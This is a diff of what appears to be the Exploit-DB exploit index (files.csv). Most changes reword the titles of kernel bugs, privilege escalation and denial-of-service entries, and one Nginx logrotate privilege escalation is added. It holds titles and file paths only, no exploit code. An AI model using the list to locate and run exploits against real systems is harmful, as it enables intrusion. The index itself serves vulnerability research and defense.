+39920,platforms/osx/dos/39920.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0 39921,platforms/android/dos/39921.txt,"Android - /system/bin/sdcard Stack Buffer Overflow",2016-06-10,"Google Security Research",android,dos,0 -39922,platforms/osx/dos/39922.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0 -39923,platforms/osx/dos/39923.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0 -39924,platforms/osx/dos/39924.c,"Apple Mac OSX - Kernel Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0 -39925,platforms/osx/dos/39925.c,"Apple Mac OSX - Kernel Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0 -39926,platforms/osx/dos/39926.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0 -39927,platforms/osx/dos/39927.c,"Apple Mac OSX - Kernel OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0 -39928,platforms/osx/dos/39928.c,"Apple Mac OSX - Kernel Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0 -39929,platforms/multiple/dos/39929.c,"Apple Mac OSX / iOS - Kernel UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0 -39930,platforms/osx/dos/39930.c,"Apple Mac OSX - Kernel Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0 +39922,platforms/osx/dos/39922.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0 +39923,platforms/osx/dos/39923.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0 +39924,platforms/osx/dos/39924.c,"Apple Mac OSX Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0 +39925,platforms/osx/dos/39925.c,"Apple Mac OSX Kernel - Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0 +39926,platforms/osx/dos/39926.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0 +39927,platforms/osx/dos/39927.c,"Apple Mac OSX Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0 +39928,platforms/osx/dos/39928.c,"Apple Mac OSX Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0 +39929,platforms/multiple/dos/39929.c,"Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0 +39930,platforms/osx/dos/39930.c,"Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow",2016-06-10,"Google Security Research",osx,dos,0 39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0 39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 39941,platforms/linux/dos/39941.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",linux,dos,0 @@ -5159,7 +5158,7 @@ id,file,description,date,author,platform,type,port 39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0 39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - '.mp3' Crash (PoC)",2016-06-21,"Ilca Lucian",linux,dos,0 39990,platforms/windows/dos/39990.txt,"Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 -39991,platforms/windows/dos/39991.txt,"Microsoft Windows - Kernel 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 +39991,platforms/windows/dos/39991.txt,"Microsoft Windows Kernel - 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 39993,platforms/win_x86/dos/39993.txt,"Microsoft Windows - Custom Font Disable Policy Bypass",2016-06-21,"Google Security Research",win_x86,dos,0 39994,platforms/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,windows,dos,0 40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router - Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0 @@ -5234,7 +5233,7 @@ id,file,description,date,author,platform,type,port 40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial of Service",2016-10-27,"Peter Baris",windows,dos,0 40638,platforms/windows/dos/40638.py,"CherryTree 0.36.9 - Memory Corruption (PoC)",2016-10-27,n30m1nd,windows,dos,0 40649,platforms/windows/dos/40649.html,"Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow",2016-10-31,"Umit Aksu",windows,dos,0 -40652,platforms/osx/dos/40652.c,"Apple OS X - Kernel IOBluetoothFamily.kext Use-After-Free",2016-10-31,"Google Security Research",osx,dos,0 +40652,platforms/osx/dos/40652.c,"Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free",2016-10-31,"Google Security Research",osx,dos,0 40654,platforms/multiple/dos/40654.txt,"Apple OS X/iOS - mach_ports_register Multiple Memory Safety Issues",2016-10-31,"Google Security Research",multiple,dos,0 40656,platforms/windows/dos/40656.txt,"NVIDIA Driver - Escape Code Leaks Uninitialised ExAllocatePoolWithTag Memory to Userspace",2016-10-31,"Google Security Research",windows,dos,0 40657,platforms/windows/dos/40657.txt,"NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x700010d",2016-10-31,"Google Security Research",windows,dos,0 @@ -5265,7 +5264,7 @@ id,file,description,date,author,platform,type,port 40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0 40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0 40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0 -3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 +3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0 @@ -5275,13 +5274,13 @@ id,file,description,date,author,platform,type,port 32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0 52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 -71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0 -72,platforms/linux/local/72.c,"xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0 +71,platforms/linux/local/71.c,"XGalaga 2.0.34 (RedHat 9.0) - Local Game Exploit",2003-07-31,c0wboy,linux,local,0 +72,platforms/linux/local/72.c,"xtokkaetama 1.0b (RedHat 9.0) - Local Game Exploit",2003-08-01,brahma,linux,local,0 75,platforms/linux/local/75.c,"man-db 2.4.1 - open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server - System Exploit",2003-08-13,ash,windows,local,0 91,platforms/linux/local/91.c,"Stunnel 3.24/4.00 - Daemon Hijacking (PoC)",2003-09-05,"Steve Grubb",linux,local,0 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 -104,platforms/linux/local/104.c,"hztty 2.0 - Privilege Escalation (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 +104,platforms/linux/local/104.c,"hztty 2.0 (RedHat 9.0) - Privilege Escalation",2003-09-21,c0wboy,linux,local,0 106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow (SPARC version)",2003-10-27,osker178,solaris,local,0 118,platforms/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 @@ -5302,9 +5301,9 @@ id,file,description,date,author,platform,type,port 172,platforms/windows/local/172.c,"FirstClass Desktop 7.1 - Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 178,platforms/linux/local/178.c,"LBL Traceroute - Privilege Escalation",2000-11-15,"Michel Kaempf",linux,local,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,linux,local,0 -182,platforms/linux/local/182.sh,"Redhat 6.2 /sbin/restore - Exploit",2000-11-16,anonymous,linux,local,0 +182,platforms/linux/local/182.sh,"RedHat 6.2 /sbin/restore - Exploit",2000-11-16,anonymous,linux,local,0 183,platforms/linux/local/183.c,"Oracle (oidldapd connect) - Local Command Line Overflow",2000-11-16,anonymous,linux,local,0 -184,platforms/linux/local/184.pl,"Redhat 6.2 Restore and Dump - Local Exploit (Perl)",2000-11-16,Tlabs,linux,local,0 +184,platforms/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Exploit (Perl)",2000-11-16,Tlabs,linux,local,0 186,platforms/linux/local/186.pl,"xsplumber - strcpy() Buffer Overflow",2000-11-17,vade79,linux,local,0 193,platforms/linux/local/193.sh,"dump 0.4b15 - Privilege Escalation",2000-11-19,mat,linux,local,0 197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",solaris,local,0 @@ -5312,8 +5311,8 @@ id,file,description,date,author,platform,type,port 200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0 202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0 203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0 -205,platforms/linux/local/205.pl,"Redhat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit",2000-11-29,Tlabs,linux,local,0 -206,platforms/linux/local/206.c,"dump 0.4b15 (Redhat 6.2) - Exploit",2000-11-29,mat,linux,local,0 +205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit",2000-11-29,Tlabs,linux,local,0 +206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0 209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0 210,platforms/solaris/local/210.c,"Solaris locale - Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0 @@ -5324,7 +5323,7 @@ id,file,description,date,author,platform,type,port 219,platforms/linux/local/219.c,"GnomeHack - Local Buffer Overflow (gid=games)",2000-12-04,"Cody Tubbs",linux,local,0 221,platforms/linux/local/221.c,"Kwintv - Local Buffer Overflow (gid=video(33))",2000-12-06,"Cody Tubbs",linux,local,0 222,platforms/linux/local/222.c,"gnome_segv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local,0 -229,platforms/linux/local/229.c,"Red Hat 6.2 xsoldier 0.96 - Exploit",2000-12-15,zorgon,linux,local,0 +229,platforms/linux/local/229.c,"xsoldier 0.96 (RedHat 6.2) - Exploit",2000-12-15,zorgon,linux,local,0 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) - Exploit",2000-12-15,mat,linux,local,0 243,platforms/bsd/local/243.c,"BSD chpass - (pw_error(3)) Privilege Escalation",2001-01-12,caddis,bsd,local,0 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation",2001-01-13,zorgon,hp-ux,local,0 @@ -5332,7 +5331,7 @@ id,file,description,date,author,platform,type,port 249,platforms/linux/local/249.c,"GLIBC locale - Format Strings Exploit",2003-01-15,logikal,linux,local,0 250,platforms/solaris/local/250.c,"Solaris 7 / 8-beta - arp Local Overflow",2001-01-15,ahmed,solaris,local,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux - Exploit",2001-01-15,teleh0r,linux,local,0 -255,platforms/linux/local/255.pl,"Redhat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 +255,platforms/linux/local/255.pl,"RedHat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow",2001-01-25,teleh0r,linux,local,0 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0 @@ -5541,7 +5540,7 @@ id,file,description,date,author,platform,type,port 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0 1406,platforms/windows/local/1406.php,"PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow",2006-01-05,mercenary,windows,local,0 -1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 +1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 1412,platforms/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,linux,local,0 1415,platforms/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,linux,local,0 1425,platforms/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,linux,local,0 @@ -5618,7 +5617,7 @@ id,file,description,date,author,platform,type,port 2338,platforms/linux/local/2338.c,"openmovieeditor 0.0.20060901 - (name) Local Buffer Overflow",2006-09-09,Qnix,linux,local,0 2360,platforms/solaris/local/2360.c,"X11R6 <= 6.4 XKEYBOARD (solaris/sparc) - Local Buffer Overflow (2)",2006-09-13,"Marco Ivaldi",solaris,local,0 2404,platforms/linux/local/2404.c,"Dr.Web AntiVirus 4.33 - (LHA long Directory name) Local Overflow",2006-09-20,Guay-Leroux,linux,local,0 -2412,platforms/windows/local/2412.c,"Microsoft Windows - Kernel Privilege Escalation (MS06-049)",2006-09-21,SoBeIt,windows,local,0 +2412,platforms/windows/local/2412.c,"Microsoft Windows Kernel - Privilege Escalation (MS06-049)",2006-09-21,SoBeIt,windows,local,0 2463,platforms/osx/local/2463.c,"Apple Mac OSX 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local,0 2464,platforms/osx/local/2464.pl,"Apple Mac OSX 10.4.7 - Mach Exception Handling Local Exploit (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local,0 2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation",2006-10-01,"Clint Torrez",linux,local,0 @@ -6057,7 +6056,7 @@ id,file,description,date,author,platform,type,port 9177,platforms/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Universal Buffer Overflow",2009-07-16,Crazy_Hacker,windows,local,0 9186,platforms/windows/local/9186.pl,"Easy RM to MP3 Converter - '.m3u' Universal Stack Overflow",2009-07-17,Stack,windows,local,0 9190,platforms/windows/local/9190.pl,"htmldoc 1.8.27.1 - '.html' Universal Stack Overflow",2009-07-17,ksa04,windows,local,0 -9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Kernel Privilege Escalation",2009-07-17,spender,linux,local,0 +9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Privilege Escalation",2009-07-17,spender,linux,local,0 9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - (getPlus_HelperSvc.exe) Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Privilege Escalation",2009-07-20,anonymous,linux,local,0 9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Privilege Escalation",2009-07-20,anonymous,linux,local,0 @@ -6097,7 +6096,7 @@ id,file,description,date,author,platform,type,port 9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 9426,platforms/windows/local/9426.java,"FTPShell Client 4.1 RC2 - Name Session Stack Overflow",2009-08-13,zec,windows,local,0 9428,platforms/windows/local/9428.pl,"pIPL 2.5.0 - '.PLS' / '.PL' Universal Local Buffer Exploit (SEH)",2009-08-13,hack4love,windows,local,0 -9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)",2009-08-14,spender,linux,local,0 +9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (RedHat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)",2009-08-14,spender,linux,local,0 9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Privilege Escalation (4)",2009-08-14,"Przemyslaw Frasunek",linux,local,0 9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 - '.xpl' Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 9466,platforms/windows/local/9466.pl,"Playlistmaker 1.51 - '.m3u' Local Buffer Overflow (SEH)",2009-08-18,blake,windows,local,0 @@ -6340,7 +6339,7 @@ id,file,description,date,author,platform,type,port 12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0 12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0 12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0 -12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (Redhat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 +12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0 @@ -6500,7 +6499,7 @@ id,file,description,date,author,platform,type,port 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0 -15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (Redhat x86_64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0 +15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86_64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0 15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0 15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0 @@ -6512,7 +6511,7 @@ id,file,description,date,author,platform,type,port 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - seh Exploit",2010-09-27,"sanjeev gupta",windows,local,0 15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH Overflow (Metasploit)",2010-09-27,"Abhishek Lyall",windows,local,0 -15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)",2010-09-29,"Jon Oberheide",linux,local,0 +15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)",2010-09-29,"Jon Oberheide",linux,local,0 15155,platforms/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0 15156,platforms/windows/local/15156.py,"Quick Player 1.3 - Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0 15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 - SafeSEH + SEHOP Exploit",2010-10-02,x90c,windows,local,0 @@ -6556,7 +6555,7 @@ id,file,description,date,author,platform,type,port 15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - '.vsc' Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0 15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0 -15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0 +15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local,0 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Buffer Overflow",2010-12-11,zota,windows,local,0 @@ -7361,9 +7360,9 @@ id,file,description,date,author,platform,type,port 40422,platforms/windows/local/40422.txt,"NetDrive 2.6.12 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local,0 20822,platforms/linux/local/20822.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (1)",2001-05-07,"Sebastian Krahmer",linux,local,0 20823,platforms/linux/local/20823.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (2)",2001-07-05,cairnsc,linux,local,0 -20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0 / Redhat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 +20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 20851,platforms/sco/local/20851.txt,"SCO OpenServer 5.0.x - StartX Weak XHost Permissions",2001-05-07,"Richard Johnson",sco,local,0 -20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows - Kernel Intel x64 SYSRET (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0 +20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client - inetd.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers",2001-05-24,"Georgi Guninski",windows,local,0 @@ -7945,7 +7944,7 @@ id,file,description,date,author,platform,type,port 27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0 27285,platforms/hardware/local/27285.txt,"Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,local,0 27296,platforms/windows/local/27296.rb,"Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005)",2013-08-02,Metasploit,windows,local,0 -27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (Redhat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,linux,local,0 +27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,linux,local,0 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0 27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 @@ -7987,6 +7986,7 @@ id,file,description,date,author,platform,type,port 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0 28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0 +40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,legalhackers,linux,local,0 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0 